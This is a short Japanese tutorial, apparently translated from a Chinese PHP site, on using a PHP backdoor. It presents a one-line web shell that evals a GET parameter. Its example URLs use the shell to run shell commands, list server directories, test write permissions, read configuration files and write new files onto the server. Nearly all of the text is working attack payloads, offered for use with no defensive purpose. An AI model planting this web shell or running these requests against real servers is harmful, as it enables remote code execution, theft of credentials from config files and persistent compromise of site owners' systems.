PHP バックドアのいくつかの使用法

今日は、PHP バックドアの最も一般的な使用法のいくつかについて説明します。

まず、最も単純なバックドア (トロイの木馬とも呼ばれる) を作成します。

<?php eval($_GET[&#39;evl&#39;]);

これで、このサーバー上で多くの実行権限を取得できました。

そのシーンはどのような用途に使われますか?

プリント サーバーphpinfo

http://www.test.com/a.php?evl=phpinfo()

ディレクトリ内にどのようなファイルがあるかを確認します

http://www.test.com/a.php?evl=var_dump(system("ls /mnt/web/ -a"));

ディレクトリが書き込み可能かどうかを確認します。次のステップです。書き込み可能なディレクトリに実行可能ファイルを作成できます

http://www.test.com/a.php?evl=var_dump(is_writable("/mnt/web/abc/"));

ファイルのコンテンツを取得します。通常は構成を読み取るために使用されます

http://www.test.com/a.php?evl=var_dump(file_get_contents("/mnt/web/temp/api.php"));

書き込み可能なディレクトリにファイルを書き込みます

http://www.test.com/a.php?evl=var_dump(file_put_contents("/mnt/web/temp/api.php",file_get_contents("/mnt/web/script/test.php")));

わかりました, 上記の部分は基本的にサーバーを表示するために使用できる部分を破壊したので、他の機能について推論してみましょう。

以上がPHP バックドアのいくつかの使用法の詳細内容です。詳細については、PHP 中国語 Web サイトの他の関連記事を参照してください。